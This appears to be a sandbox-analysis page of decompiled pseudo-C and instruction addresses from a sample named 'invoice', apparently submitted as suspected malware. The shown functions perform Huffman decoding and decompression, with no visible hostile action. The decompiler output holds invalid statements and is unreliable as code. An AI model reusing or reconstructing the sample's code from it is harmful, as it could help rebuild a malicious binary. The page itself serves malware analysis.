											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a3e8 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a3e8 + __eax * 2) & 0x0000ffff =  *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a3e8 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406F19( &(__esi[3]), __edi, 0x101, 0x40840c, 0x40844c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406F19(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40848c, 0x4084c8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406EB1( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406742
0x00406742
0x00406742
0x00406742
0x00406742
0x00406746
0x00000000
0x00000000
0x0040674c
0x0040674c
0x0040674f
0x00406752
0x00406757
0x00406759
0x0040675c
0x0040675f
0x00406762
0x00406762
0x00406765
0x00000000
0x00000000
0x00406767
0x00406767
0x0040676a
0x0040676f
0x00406771
0x00406774
0x0040677a
0x004064d9
0x004064d9
0x004064dc
0x004064e2
0x004064e8
0x004064f1
0x004064f7
0x004064fa
0x00406501
0x00406506
0x0040650c
0x00406517
0x00406517
0x00406780
0x00406780
0x0040678a
0x00000000
0x00000000
0x00406790
0x00406790
0x00406794
0x00406797
0x00406797
0x0040679b
0x004067a1
0x004067a1
0x004067a4
0x004067a7
0x004067ad
0x00000000
0x00000000
0x004067af
0x004067d1
0x004067d1
0x004067d4
0x00000000
0x00000000
0x004067b1
0x004067b5
0x00000000
0x00000000
0x004067bb
0x004067bb
0x004067be
0x004067c1
0x004067c6
0x004067c8
0x004067cb
0x004067ce
0x004067ce
0x004067d6
0x004067d6
0x004067dc
0x004067df
0x004067e2
0x004067e2
0x004067e9
0x004067ed
0x004067f1
0x004067f4
0x004067f7
0x004067fd
0x00406802
0x00000000
0x00000000
0x00406804
0x00406818
0x00406818
0x0040681c
0x00000000
0x00000000
0x00406806
0x00406809
0x00406809
0x00406810
0x00406815
0x00406815
0x00406815
0x0040681e
0x0040681e
0x00406821
0x0040682f
0x00406835
0x0040683a
0x00406840
0x00406846
0x0040684c
0x00406853
0x00406867
0x00406867
0x00406e36
0x00406e36
0x00406e36
0x00406e3b
0x00000000
0x00000000
0x00406473
0x00406473
0x00000000
0x00406a6e
0x00406a6e
0x00406a72
0x00406a75
0x00406a78
0x00406a7b
0x00000000
0x00000000
0x00406a81
0x00406a81
0x00406aa6
0x00406aa6
0x00406aa6
0x00406aa8
0x00000000
0x00000000
0x00406a86
0x00406a86
0x00406a8a
0x00000000
0x00000000
0x00406a90
0x00406a90
0x00406a93
0x00406a96
0x00406a99
0x00406a9b
0x00406a9d
0x00406aa0
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aaa
0x00406aaa
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abb
0x00406abf
0x00406ac2
0x00406ac4
0x00406ac7
0x00406ac9
0x00406add
0x00406add
0x00406ae0
0x00406afa
0x00406afa
0x00406afd
0x00000000
0x00000000
0x00406b03
0x00406b03
0x00406b06
0x00000000
0x00000000
0x00406b0c
0x00406b0c
0x00000000
0x00406b0c
0x00406ae2
0x00406ae5
0x00406aec
0x00406aef
0x00000000
0x00406aef
0x00406acb
0x00406acf
0x00406ad2
0x00000000
0x00000000
0x00406b17
0x00406b17
0x00406b3c
0x00406b3c
0x00406b3c
0x00406b3e
0x00000000
0x00000000
0x00406b1c
0x00406b1c
0x00406b20
0x00000000
0x00000000
0x00406b26
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b31
0x00406b33
0x00406b36
0x00406b39
0x00406b39
0x00406b39
0x00406b40
0x00406b48
0x00406b4b
0x00406b4e
0x00406b50
0x00406b53
0x00406b53
0x00406b55
0x00406b59
0x00406b5c
0x00406b5f
0x00406b62
0x00000000
0x00000000
0x00406b68
0x00406b68
0x00406b8d
0x00406b8d
0x00406b8d
0x00406b8f
0x00000000
0x00000000
0x00406b6d
0x00406b6d
0x00406b71
0x00000000
0x00000000
0x00406b77
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b82
0x00406b84
0x00406b87
0x00406b8a
0x00406b8a
0x00406b8a
0x00406b91
0x00406b91
0x00406b99
0x00406b9c
0x00406b9f
0x00406ba2
0x00406ba6
0x00406ba9
0x00406bab
0x00406bae
0x00406bb1
0x00406bcb
0x00406bcb
0x00406bce
0x00000000
0x00000000
0x00406bd4
0x00406bd4
0x00406bd7
0x00406bde
0x00000000
0x00406bde
0x00406bb3
0x00406bb6
0x00406bbd
0x00406bc0
0x00000000
0x00000000
0x00406be6
0x00406be6
0x00406c0b
0x00406c0b
0x00406c0b
0x00406c0d
0x00000000
0x00000000
0x00406beb
0x00406beb
0x00406bef
0x00000000
0x00000000
0x00406bf5
0x00406bf5
0x00406bf8
0x00406bfb
0x00406bfe
0x00406c00
0x00406c02
0x00406c05
0x00406c08
0x00406c08
0x00406c08
0x00406c0f
0x00406c17
0x00406c1a
0x00406c1d
0x00406c1f
0x00406c22
0x00406c22
0x00406c24
0x00000000
0x00000000
0x00406c2a
0x00406c2a
0x00406c2d
0x00406c32
0x00406c34
0x00406c3a
0x00406c3c
0x00406c51
0x00406c53
0x00406c53
0x00406c3e
0x00406c44
0x00406c46
0x00406c48
0x00406c48
0x00406c55
0x00406c59
0x00406c5c
0x00406c62
0x00406c62
0x00406c65
0x00406c65
0x00406c65
0x00406c67
0x00000000
0x00000000
0x00406c6d
0x00406c6d
0x00406c73
0x00406c75
0x00406c9a
0x00406c9d
0x00406ca3
0x00406ca8
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb9
0x00406cc2
0x00406cc8
0x00406cc8
0x00406cbb
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cca
0x00406cd0
0x00406cd2
0x00406cd5
0x00406cd7
0x00406cdd
0x00406cdf
0x00406ce1
0x00406ce3
0x00406ce5
0x00406ce8
0x00406cf1
0x00406cf4
0x00406cf4
0x00406cea
0x00406cea
0x00406ced
0x00406ced
0x00406ce8
0x00406cdf
0x00406cf6
0x00406cf8
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cf8
0x00406c77
0x00406c77
0x00406c7d
0x00406c83
0x00406c85
0x00000000
0x00000000
0x00406c87
0x00406c87
0x00406c89
0x00406c8b
0x00406c94
0x00406c94
0x00406c8d
0x00406c8d
0x00406c90
0x00406c90
0x00406c96
0x00406c98
0x00000000
0x00000000
0x00406cfe
0x00406cfe
0x00406d03
0x00406d05
0x00406d06
0x00406d07
0x00406d08
0x00406d0e
0x00406d11
0x00406d14
0x00406d17
0x00406d19
0x00406d1f
0x00406d1f
0x00406d22
0x00406d22
0x00406d22
0x00406d22
0x00406d2b
0x00000000
0x00000000
0x00406d30
0x00406d30
0x00406d33
0x00406d36
0x00406d38
0x00406dcf
0x00406dcf
0x00406dd2
0x00406dd4
0x00406dd5
0x00406dd6
0x00406dd9
0x00000000
0x00406dd9
0x00406d3e
0x00406d3e
0x00406d44
0x00406d46
0x00406d6b
0x00406d6e
0x00406d74
0x00406d79
0x00406d7f
0x00406d85
0x00406d87
0x00406d8a
0x00406d93
0x00406d99
0x00406d99
0x00406d8c
0x00406d8e
0x00406d90
0x00406d90
0x00406d9b
0x00406da1
0x00406da3
0x00406da6
0x00406da8
0x00406dae
0x00406db0
0x00406db2
0x00406db4
0x00406db6
0x00406db9
0x00406dc2
0x00406dc5
0x00406dc5
0x00406dbb
0x00406dbb
0x00406dbe
0x00406dbe
0x00406db9
0x00406db0
0x00406dc7
0x00406dc9
0x00000000
0x00000000
0x00000000
0x00000000
0x00406dc9
0x00406d48
0x00406d48
0x00406d4e
0x00406d54
0x00406d56
0x00000000
0x00000000
0x00406d58
0x00406d58
0x00406d5a
0x00406d5c
0x00406d63
0x00406d63
0x00406d65
0x00406d5e
0x00406d5e
0x00406d60
0x00406d60
0x00406d67
0x00406d69
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406de1
0x00406de1
0x00406de4
0x00406de6
0x00406de9
0x00406dec
0x00406dec
0x00406dec
0x00406dec
0x00000000
0x00000000
0x00000000
0x0040649a
0x0040647e
0x00000000
0x00406484
0x00406487
0x00406491
0x00406494
0x00406497
0x00000000
0x00406497
0x0040647e
0x004064a2
0x004064a5
0x004064a9
0x004064b3
0x004064bd
0x004064c0
0x004064c6
0x004065fa
0x004065fc
0x00406602
0x00406605
0x00406608
0x00000000
0x00406608
0x004064cc
0x004064cc
0x004064cd
0x00406525
0x00406525
0x0040652c
0x004065d2
0x004065d2
0x004065d7
0x004065da
0x004065df
0x004065e2
0x004065e7
0x004065ea
0x004065ef
0x004065f2
0x004065f2
0x00000000
0x00406532
0x00406532
0x00406532
0x00406532
0x00406536
0x00406536
0x00406558
0x0040655b
0x0040655d
0x00406560
0x00406565
0x0040653b
0x0040653b
0x00406540
0x00406542
0x00406544
0x00406549
0x0040654f
0x00406554
0x00406556
0x00406556
0x0040654b
0x0040654b
0x0040654b
0x00406549
0x00000000
0x00406567
0x00406594
0x00406599
0x0040659b
0x0040659c
0x0040659e
0x0040659f
0x0040659f
0x0040659f
0x004065c7
0x004065cc
0x004065cc
0x00000000
0x004065cc
0x00406565
0x0040652c
0x004064cf
0x004064cf
0x004064d0
0x0040651a
0x00000000
0x0040651a
0x004064d2
0x004064d3
0x00000000
0x00000000
0x00000000
0x00000000
0x0040662f
0x0040662f
0x0040662f
0x00406632
0x00000000
0x00000000
0x0040660f
0x0040660f
0x00406613
0x00000000
0x00000000
0x00406619
0x00406619
0x0040661c
0x0040661f
0x00406624
0x00406626
0x00406629
0x0040662c
0x0040662c
0x0040662c
0x00406634
0x00406634
0x00406637
0x00406639
0x0040663e
0x00406641
0x00406643
0x00406646
0x00000000
0x00000000
0x0040664c
0x0040664c
0x0040664e
0x00000000
0x00000000
0x00406654
0x00406654
0x00406658
0x00000000
0x00000000
0x0040665e
0x0040665e
0x00406661
0x00406663
0x00406701
0x00406701
0x00406704
0x00406706
0x00406706
0x00406709
0x0040670c
0x0040670e
0x00406710
0x00406712
0x00406712
0x0040671b
0x00406720
0x00406723
0x00406726
0x00406729
0x0040672c
0x0040672c
0x0040672c
0x0040672f
0x00406735
0x00406735
0x0040673b
0x0040673b
0x0040673b
0x00000000
0x0040672f
0x00406669
0x00406669
0x0040666f
0x00406672
0x00406674
0x0040669f
0x004066a2
0x004066a8
0x004066ad
0x004066b3
0x004066b9
0x004066bb
0x004066be
0x004066c7
0x004066cd
0x004066cd
0x004066c0
0x004066c2
0x004066c4
0x004066c4
0x004066cf
0x004066d5
0x004066d8
0x004066da
0x004066dc
0x004066e2
0x004066e4
0x004066e6
0x004066e9
0x004066f2
0x004066f2
0x004066f4
0x004066eb
0x004066eb
0x004066ee
0x004066ee
0x004066f6
0x004066f6
0x004066e4
0x004066f9
0x004066fb
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fb
0x00406676
0x00406676
0x0040667c
0x00406682
0x00406684
0x00000000
0x00000000
0x00406686
0x00406686
0x00406688
0x0040668a
0x0040668d
0x00406694
0x00406694
0x00406696
0x0040668f
0x0040668f
0x00406691
0x00406691
0x00406698
0x0040669a
0x0040669d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067a1
0x004067a4
0x004067a7
0x004067ad
0x00000000
0x00000000
0x00000000
0x00000000
0x00406984
0x00406984
0x00406984
0x00406987
0x0040698a
0x0040698c
0x0040698f
0x00406995
0x0040699c
0x0040699e
0x00000000
0x00000000
0x00406872
0x00406872
0x0040689a
0x0040689a
0x0040689a
0x0040689c
0x00000000
0x00000000
0x0040687a
0x0040687a
0x0040687e
0x00000000
0x00000000
0x00406884
0x00406884
0x00406887
0x0040688a
0x0040688d
0x0040688f
0x00406891
0x00406894
0x00406897
0x00406897
0x00406897
0x0040689e
0x0040689e
0x004068a6
0x004068a9
0x004068af
0x004068b2
0x004068b6
0x004068ba
0x004068bd
0x004068c0
0x004068d8
0x004068d8
0x004068db
0x004068e9
0x004068ec
0x004068dd
0x004068dd
0x004068df
0x004068e6
0x004068e6
0x00406915
0x00406915
0x00406915
0x00406918
0x0040691a
0x00000000
0x00000000
0x004068f5
0x004068f5
0x004068f9
0x00000000
0x00000000
0x004068ff
0x004068ff
0x00406902
0x00406905
0x00406908
0x0040690a
0x0040690c
0x0040690f
0x00406912
0x00406912
0x00406912
0x0040691c
0x0040691c
0x0040691e
0x00406920
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406935
0x00406937
0x0040693a
0x0040693d
0x00406942
0x00406945
0x00406948
0x0040694b
0x00406952
0x00406955
0x00406957
0x00000000
0x00000000
0x0040695d
0x0040695d
0x00406961
0x00406972
0x00406972
0x00406972
0x00406974
0x00406974
0x00406978
0x00406978
0x00406978
0x0040697a
0x0040697b
0x0040697e
0x0040697e
0x0040697e
0x00406981
0x00000000
0x00406981
0x00406963
0x00406963
0x00406966
0x00000000
0x00000000
0x0040696c
0x0040696c
0x00000000
0x0040696c
0x004068c2
0x004068c2
0x004068c4
0x004068c6
0x004068c9
0x004068cc
0x004068d0
0x004068d0
0x004069a4
0x004069a4
0x004069a7
0x004069ae
0x004069b2
0x004069b4
0x004069b7
0x004069ba
0x004069bf
0x004069c2
0x004069c4
0x004069c5
0x004069c8
0x004069d3
0x004069d6
0x004069ed
0x004069f2
0x004069f9
0x004069fe
0x00406a02
0x00406a04
0x00406a04
0x00406a04
0x00406a07
0x00406a09
0x00000000
0x00406a0f
0x00406a0f
0x00406a13
0x00406a1e
0x00406a31
0x00406a36
0x00406a3b
0x00406a3d
0x00000000
0x00000000
0x00406a43
0x00406a43
0x00406a46
0x00406a48
0x00406a56
0x00406a56
0x00406a59
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00000000
0x00406a6b
0x00406a4a
0x00406a4a
0x00406a50
0x00000000
0x00000000
0x00000000
0x00406a50
0x00000000
0x00000000
0x00000000
0x00406def
0x00406def
0x00406df5
0x00406dfb
0x00406e00
0x00406e06
0x00406e0c
0x00406e0e
0x00406e11
0x00406e1a
0x00406e20
0x00406e20
0x00406e13
0x00406e15
0x00406e17
0x00406e17
0x00406e22
0x00406e24
0x00406e27
0x00406e62
0x00406e62
0x00000000
0x00406e29
0x00406e29
0x00406e29
0x00406e2f
0x00406e32
0x00406e34
0x00406e69
0x00406e6b
0x00000000
0x00406e6b
0x00000000
0x00406e34
0x00000000
0x00406473
0x00406e41
0x00000000
0x00406e41
0x00406855
0x00406857
0x00000000
0x00000000
0x00406859
0x00406859
0x0040685c
0x00000000
0x0040685c
0x004067a1
0x00406762
0x00406e46
0x00406e49
0x00406e4b
0x00406e54
0x00406e5a
0x00000000

Memory Dump Source

Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_invoice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
Instruction ID: 12ef56279526f9f53f22afc89151adbe845766d01d6fb7ada6890335ffbed449
Opcode Fuzzy Hash: 8a4aeacf9715bb3b10a0377ad2d0224b4eefc29aff23ed095be582f5b156e71c
Instruction Fuzzy Hash: 5EE19A7190070ADFCB24CF58C980BAABBF1EB45305F15852EE497A72D1E338AA91CF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406F19 Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406F19(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d688 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d688;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d688 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
